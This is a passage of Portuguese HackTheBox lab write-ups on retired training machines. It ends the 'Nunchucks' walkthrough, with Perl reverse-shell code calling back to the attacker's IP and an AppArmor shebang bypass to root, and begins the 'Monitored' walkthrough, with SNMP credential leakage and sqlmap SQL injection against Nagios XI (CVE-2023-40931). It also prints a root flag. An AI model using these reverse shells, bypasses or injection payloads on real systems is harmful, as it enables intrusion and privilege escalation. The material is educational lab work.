(remote) david@nunchucks:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); use Socket;$i="10.10.14.128";$p=9002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

O comando acima tenta após setar o user id para 0 criar uma conexão reversa com a nossa máquina na porta 9002 (que estamos ouvindo através do pwncat em outra aba do terminal).

A conexão é enviada para nosso pwncat, mas ela é encerrada logo em seguida:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/nunchucks]
└─# pwncat-cs -lp 9002
[09:48:04] Welcome to pwncat 🐈!                                                                                                          __main__.py:164
[13:45:32] received connection from 10.129.95.252:37184                                                                                         bind.py:84
[13:45:32] connection failed: channel unexpectedly closed                                                                                  manager.py:957
(local) pwncat$

Aqui temos uma pergunta a ser respondida, por que alguns comandos funcionam e outros não.

Vemos que conseguimos executar o comando id também:

(remote) david@nunchucks:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "id";'
uid=0(root) gid=1000(david) groups=1000(david)

Não obtivemos sucesso tentando executar um script ou um simples cat.

Existem regras que podem limitar a execução em binários, através do SELinux ou Apparmor. Em nosso caso é o Appamor, por se tratar de um ubuntu.

Verificando o apparmor encontramos a seguinte regra:

(remote) david@nunchucks:/etc/apparmor.d$ ls -alh
total 72K
drwxr-xr-x   7 root root 4.0K Oct 28  2021 .
drwxr-xr-x 125 root root  12K Oct 29  2021 ..
drwxr-xr-x   4 root root 4.0K Oct 28  2021 abstractions
drwxr-xr-x   2 root root 4.0K Oct 28  2021 disable
drwxr-xr-x   2 root root 4.0K Oct 28  2021 force-complain
drwxr-xr-x   2 root root 4.0K Oct 28  2021 local
-rw-r--r--   1 root root 1.3K May 19  2020 lsb_release
-rw-r--r--   1 root root 1.1K May 19  2020 nvidia_modprobe
-rw-r--r--   1 root root 3.2K Mar 11  2020 sbin.dhclient
drwxr-xr-x   5 root root 4.0K Oct 28  2021 tunables
-rw-r--r--   1 root root 3.2K Feb 25  2020 usr.bin.man
-rw-r--r--   1 root root  442 Sep 26  2021 usr.bin.perl
-rw-r--r--   1 root root  672 Feb 19  2020 usr.sbin.ippusbxd
-rw-r--r--   1 root root 2.0K Jul 22  2021 usr.sbin.mysqld
-rw-r--r--   1 root root 1.6K Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r--   1 root root 1.4K Dec  7  2019 usr.sbin.tcpdump
(remote) david@nunchucks:/etc/apparmor.d$ cat usr.bin.perl 
# Last Modified: Tue Aug 31 18:25:30 2021
#include <tunables/global>

/usr/bin/perl {
  #include <abstractions/base>
  #include <abstractions/nameservice>
  #include <abstractions/perl>

  capability setuid,

  deny owner /etc/nsswitch.conf r,
  deny /root/* rwx,
  deny /etc/shadow rwx,

  /usr/bin/id mrix,
  /usr/bin/ls mrix,
  /usr/bin/cat mrix,
  /usr/bin/whoami mrix,
  /opt/backup.pl mrix,
  owner /home/ r,
  owner /home/david/ r,

}

O apparmor é um MAC (Mandatory Access Control) que é implementado no kernel do linux visando controlar e limitar determinados recursos, como programas, binários e etc.

Continuando na saga para escalar privilégios para root podemos ponderar alguns pontos:

Somente determinados comandos conseguem ser executados devido ao apparmor
Não conseguimos executar nada no diretório /root, devido ao apparmor

No entanto, seguindo passos similares ao que ja tentamos foi possível executar o seguinte.

Primeiro criamos um script em perl setando o user id para 0 e executando nosso reverse shell, com o seguinte conteúdo:

#!/usr/bin/perl
use POSIX qw(setuid); POSIX::setuid(0);
use Socket;$i="10.10.14.128";$p=9002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};s

E ao executar nosso script:

(remote) david@nunchucks:/home/david$ ./exp.pl

Temos o seguinte retorno em nosso pwncat:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/nunchucks]
└─# pwncat-cs -lp 9002
[14:47:11] Welcome to pwncat 🐈!                                                                                                          __main__.py:164
[14:50:31] received connection from 10.129.2.248:37982                                                                                         bind.py:84
[14:50:36] 0.0.0.0:9002: upgrading from /usr/bin/dash to /usr/bin/bash                                                                     manager.py:957
[14:50:39] 10.129.2.248:37982: registered new host w/ db                                                                                   manager.py:957
(local) pwncat$                                                                                                                                          
(remote) root@nunchucks:/home/david# id
uid=0(root) gid=1000(david) groups=1000(david)

Buscando entender o por que do script ter executado, ao contrário da mesma execução via linha de comando foi encontrado o seguinte bug:

Bug #1911431 “Unable to prevent execution of shebang lines” : Bugs : AppArmor

Basicamente o shebang (#!) faz com que o perl ignore o apparmor e execute sem restrições.

Com isso conseguimos nossa shell como usuário root:

(remote) root@nunchucks:/home/david# cat /root/root.txt 
d24de14bd4c16c24fb1158033cafe1e9

Conseguindo assim a root flag e finalizando a máquina Nunchucks :)

HackTheBox - Writeup Monitored [Retired]

Guilherme Martins — Sun, 02 Jun 2024 17:30:08 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível medium chamada Monitored que aborda as seguintes vulnerabilidades e técnicas:

SNMP Data Collect
SQL Injection
Remote Code Execution
Week Permissions for files

Recon e User Flag

Iremos iniciar nossa análise do alvo realizando uma varredura a procura de portas abertas através do nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/biznet]
└─# nmap -sV --open -Pn 10.129.15.145 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-13 14:19 EST
Nmap scan report for 10.129.15.145
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.56
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
443/tcp open  ssl/http Apache httpd 2.4.56 ((Debian))
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.33 seconds

Pelo certificado ssl encontramos o subdomínio nagions.monitored.htb:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# curl -vk https://10.129.130.92
*   Trying 10.129.130.92:443...
* Connected to 10.129.130.92 (10.129.130.92) port 443 (#0)
...
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN: server accepted http/1.1
* Server certificate:
*  subject: C=UK; ST=Dorset; L=Bournemouth; O=Monitored; CN=nagios.monitored.htb; emailAddress=support@monitored.htb
*  start date: Nov 11 21:46:55 2023 GMT
*  expire date: Aug 25 21:46:55 2297 GMT
*  issuer: C=UK; ST=Dorset; L=Bournemouth; O=Monitored; CN=nagios.monitored.htb; emailAddress=support@monitored.htb
*  SSL certificate verify result: self-signed certificate (18), continuing anyway.

Vamos adiciona-lo ao /etc/hosts.

Ao acessar temos uma tela que redireciona para /nagiosxi:
O usuário e senha padrão do nagios xi é nagiosadmin:nagiosadmin, no entanto, não é este o caso.

Vamos utilizar o gobuster para descobrir diretórios e endpoints:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://nagios.monitored.htb/nagiosxi/ -k -x .php,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://nagios.monitored.htb/nagiosxi/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2024/01/13 14:52:15 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/about                (Status: 301) [Size: 325] [--> https://nagios.monitored.htb/nagiosxi/about/]
/account              (Status: 301) [Size: 327] [--> https://nagios.monitored.htb/nagiosxi/account/]
/admin                (Status: 301) [Size: 325] [--> https://nagios.monitored.htb/nagiosxi/admin/]
/api                  (Status: 301) [Size: 323] [--> https://nagios.monitored.htb/nagiosxi/api/]
/backend              (Status: 301) [Size: 327] [--> https://nagios.monitored.htb/nagiosxi/backend/]
/config               (Status: 301) [Size: 326] [--> https://nagios.monitored.htb/nagiosxi/config/]
/db                   (Status: 301) [Size: 322] [--> https://nagios.monitored.htb/nagiosxi/db/]
/help                 (Status: 301) [Size: 324] [--> https://nagios.monitored.htb/nagiosxi/help/]
/images               (Status: 301) [Size: 326] [--> https://nagios.monitored.htb/nagiosxi/images/]
/includes             (Status: 301) [Size: 328] [--> https://nagios.monitored.htb/nagiosxi/includes/]
/index.php            (Status: 302) [Size: 27] [--> https://nagios.monitored.htb/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1]
/install.php          (Status: 302) [Size: 0] [--> https://nagios.monitored.htb/nagiosxi/]
/login.php            (Status: 200) [Size: 26148]
/mobile               (Status: 301) [Size: 326] [--> https://nagios.monitored.htb/nagiosxi/mobile/]
/reports              (Status: 301) [Size: 327] [--> https://nagios.monitored.htb/nagiosxi/reports/]
/rr.php               (Status: 302) [Size: 0] [--> login.php]
/sounds               (Status: 403) [Size: 279]
/suggest.php          (Status: 200) [Size: 27]
/terminal             (Status: 200) [Size: 5215]
/tools                (Status: 301) [Size: 325] [--> https://nagios.monitored.htb/nagiosxi/tools/]
/upgrade.php          (Status: 302) [Size: 0] [--> index.php]
/views                (Status: 301) [Size: 325] [--> https://nagios.monitored.htb/nagiosxi/views/]
Progress: 61407 / 61410 (100.00%)
===============================================================

Aqui temos alguns endpoints interessantes, como o /terminal que é um terminal via navegador conhecido como shell in a box, mas ele precisa de usuário e senha para acesso.
O mesmo se aplica ao endpoint /api, que como o nome sugere é responsável pela api do nagios xi. Também é necessário ter autenticação.

Vamos utilizar o gobuster novamente, mas desta vez diretamente no subdomínio:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://nagios.monitored.htb/ -k -x .php,.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://nagios.monitored.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2024/01/13 16:30:51 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/cgi-bin/             (Status: 403) [Size: 279]
/cgi-bin/.php         (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 3245]
/javascript           (Status: 301) [Size: 321] [--> https://10.129.15.145/javascript/]
/nagios               (Status: 401) [Size: 461]
/server-status        (Status: 403) [Size: 279]
Progress: 61403 / 61410 (99.99%)
===============================================================

Aqui temos outros endpoints interessantes, como o /nagios, que possui uma autenticação via Basic Auth, no qual o navegador nos da um pop up solicitando os dados de acesso.

Como possui um ldap podemos executar um recon com snmpwalk para coletar dados SNMP:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# snmpwalk -v1 -c public nagios.monitored.htb | grep STRING
...
iso.3.6.1.2.1.25.4.2.1.4.966 = STRING: "/usr/local/nagios/bin/nagios"
iso.3.6.1.2.1.25.4.2.1.4.967 = STRING: "/usr/local/nagios/bin/nagios"
iso.3.6.1.2.1.25.4.2.1.4.968 = STRING: "/usr/local/nagios/bin/nagios"
iso.3.6.1.2.1.25.4.2.1.4.969 = STRING: "/usr/local/nagios/bin/nagios"
iso.3.6.1.2.1.25.4.2.1.4.970 = STRING: "/usr/local/nagios/bin/nagios"
iso.3.6.1.2.1.25.4.2.1.4.1351 = STRING: "/usr/local/nagios/bin/nagios"
iso.3.6.1.2.1.25.4.2.1.4.1362 = STRING: "sudo"
iso.3.6.1.2.1.25.4.2.1.4.1363 = STRING: "/bin/bash"
iso.3.6.1.2.1.25.4.2.1.4.1403 = STRING: "/usr/sbin/exim4"
iso.3.6.1.2.1.25.4.2.1.4.6830 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.7994 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10341 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10410 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10412 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10413 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10739 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10814 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.10991 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11088 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11096 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11216 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11249 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11338 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11340 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11458 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11459 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11464 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11556 = STRING: "sleep"
iso.3.6.1.2.1.25.4.2.1.4.11572 = STRING: "/usr/sbin/CRON"
iso.3.6.1.2.1.25.4.2.1.4.11575 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.4.11576 = STRING: "/usr/bin/php"
iso.3.6.1.2.1.25.4.2.1.4.11578 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.11587 = STRING: "/usr/sbin/exim4"
iso.3.6.1.2.1.25.4.2.1.5.467 = STRING: "--config /etc/laurel/config.toml"
iso.3.6.1.2.1.25.4.2.1.5.532 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.533 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
iso.3.6.1.2.1.25.4.2.1.5.537 = STRING: "-n -iNONE"
iso.3.6.1.2.1.25.4.2.1.5.540 = STRING: "-u -s -O /run/wpa_supplicant"
iso.3.6.1.2.1.25.4.2.1.5.544 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.562 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB "
iso.3.6.1.2.1.25.4.2.1.5.640 = STRING: "-4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0"
iso.3.6.1.2.1.25.4.2.1.5.729 = STRING: "-f /usr/local/nagios/etc/pnp/npcd.cfg"
iso.3.6.1.2.1.25.4.2.1.5.735 = STRING: "-LOw -f -p /run/snmptrapd.pid"
iso.3.6.1.2.1.25.4.2.1.5.750 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.757 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.760 = STRING: "-p /var/run/ntpd.pid -g -u 108:116"
iso.3.6.1.2.1.25.4.2.1.5.793 = STRING: "-q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit"
iso.3.6.1.2.1.25.4.2.1.5.794 = STRING: "-q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit"
iso.3.6.1.2.1.25.4.2.1.5.800 = STRING: "-D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf"
iso.3.6.1.2.1.25.4.2.1.5.840 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.846 = STRING: "-h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d"
iso.3.6.1.2.1.25.4.2.1.5.934 = STRING: "-pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6"
iso.3.6.1.2.1.25.4.2.1.5.952 = STRING: "/usr/sbin/snmptt --daemon"
iso.3.6.1.2.1.25.4.2.1.5.954 = STRING: "/usr/sbin/snmptt --daemon"
iso.3.6.1.2.1.25.4.2.1.5.966 = STRING: "-d /usr/local/nagios/etc/nagios.cfg"
iso.3.6.1.2.1.25.4.2.1.5.967 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.968 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.969 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.970 = STRING: "--worker /usr/local/nagios/var/rw/nagios.qh"
iso.3.6.1.2.1.25.4.2.1.5.1351 = STRING: "-d /usr/local/nagios/etc/nagios.cfg"
iso.3.6.1.2.1.25.4.2.1.5.1362 = STRING: "-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.1363 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.1403 = STRING: "-bd -q30m"
iso.3.6.1.2.1.25.4.2.1.5.6830 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.7994 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.10410 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.10412 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.10413 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.10739 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.10991 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11088 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11096 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11216 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11249 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11338 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11458 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11464 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11578 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11612 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11650 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11654 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11655 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11657 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.11689 = STRING: "60"
iso.3.6.1.2.1.25.4.2.1.5.11697 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.11698 = STRING: "-c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1"
iso.3.6.1.2.1.25.4.2.1.5.11699 = STRING: "-q /usr/local/nagiosxi/cron/cmdsubsys.php"
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "adduser_3.118+deb11u1_all"
...

Como a saída do snmpwalk é muito grande foi filtrado por STRING e temos um usuário e senha:
svc:XjH7VCehowpR1xZB

Com esse user não conseguimos acessar via ssh nem o endpoint /nagiosxi, no entanto, conseguimos em nagios.monitored.htb/nagios.

Analisando as docs do nagios xi (que é bem limitada) encontramos um endpoint no nagiosxi chamado /api/v1/authenticate que é utilizado para gerar um token de autenticação:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# curl -k -XPOST -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=1000' https://nagios.monitored.htb/nagiosxi/api/v1/authenticate    
{"username":"svc","user_id":"2","auth_token":"c035f0bb3bbb9f6230d99675fdbf21941386e525","valid_min":1000,"valid_until":"Mon, 15 Jan 2024 06:59:41 -0500"}

E assim conseguimos gerar um token, no qual utilizamos para acessar a api do nagioxi.
O nagioxi por sua vez possui diversas vulnerabilidades recentes, dentre elas a CVE-2023-40931.

Que através da api podemos utilizar o sqlmap para explora-la:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=c035f0bb3bbb9f6230d99675fdbf21941386e525" --batch --tables                                  
        ___
       __H__                                                                                                                                     
 ___ ___["]_____ ___ ___  {1.7.9.2#dev}                                                                                                          
|_ -| . ["]     | .'| . |                                                                                                                        
|___|_  ["]_|_|_|__,|  _|                                                                                                                        
      |_|V...       |_|   https://sqlmap.org
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[14:34:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:34:05] [WARNING] GET parameter 'action' does not seem to be injectable
[14:34:05] [INFO] testing if GET parameter 'id' is dynamic
[14:34:06] [WARNING] GET parameter 'id' does not appear to be dynamic
[14:34:07] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[14:34:07] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[14:34:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:34:08] [WARNING] reflective value(s) found and filtering out
[14:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:34:18] [INFO] GET parameter 'id' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[14:34:18] [INFO] testing 'Generic inline queries'
[14:34:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:34:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:34:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:34:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:34:22] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[14:34:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[14:34:24] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:34:25] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:34:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:34:26] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:34:27] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:34:27] [INFO] testing 'MySQL inline queries'
...
...
[14:34:46] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
...
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 271 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (7780=7780) THEN 3 ELSE (SELECT 8823 UNION SELECT 4738) END))&token=c035f0bb3bbb9f6230d99675fdbf21941386e525

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=acknowledge_banner_message&id=3 OR (SELECT 6550 FROM(SELECT COUNT(*),CONCAT(0x7170626b71,(SELECT (ELT(6550=6550,1))),0x716b7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&token=c035f0bb3bbb9f6230d99675fdbf21941386e525

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=acknowledge_banner_message&id=3 AND (SELECT 6899 FROM (SELECT(SLEEP(5)))agwy)&token=c035f0bb3bbb9f6230d99675fdbf21941386e525
---
[14:37:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
...
Database: information_schema
[82 tables]
+---------------------------------------+
| ALL_PLUGINS                           |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
| CHECK_CONSTRAINTS                     |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| ENABLED_ROLES                         |
| FILES                                 |
| GEOMETRY_COLUMNS                      |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_METRICS                        |
| INNODB_MUTEXES                        |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_DATAFILES                  |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_SEMAPHORE_WAITS            |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESPACES                |
| INNODB_SYS_TABLESTATS                 |
| INNODB_SYS_VIRTUAL                    |
| INNODB_TABLESPACES_ENCRYPTION         |
| INNODB_TRX                            |
| KEYWORDS                              |
| KEY_CACHES                            |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| SPATIAL_REF_SYS                       |
| SQL_FUNCTIONS                         |
| STATISTICS                            |
| SYSTEM_VARIABLES                      |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| THREAD_POOL_GROUPS                    |
| THREAD_POOL_QUEUES                    |
| THREAD_POOL_STATS                     |
| THREAD_POOL_WAITS                     |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
| user_variables                        |
+---------------------------------------+

Database: nagiosxi
[22 tables]
+---------------------------------------+
| xi_auditlog                           |
| xi_auth_tokens                        |
| xi_banner_messages                    |
| xi_cmp_ccm_backups                    |
| xi_cmp_favorites                      |
| xi_cmp_nagiosbpi_backups              |
| xi_cmp_scheduledreports_log           |
| xi_cmp_trapdata                       |
| xi_cmp_trapdata_log                   |
| xi_commands                           |
| xi_deploy_agents                      |
| xi_deploy_jobs                        |
| xi_eventqueue                         |
| xi_events                             |
| xi_link_users_messages                |
| xi_meta                               |
| xi_mibs                               |
| xi_options                            |
| xi_sessions                           |
| xi_sysstat                            |
| xi_usermeta                           |
| xi_users                              |
+---------------------------------------+
[14:40:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/nagios.monitored.htb'

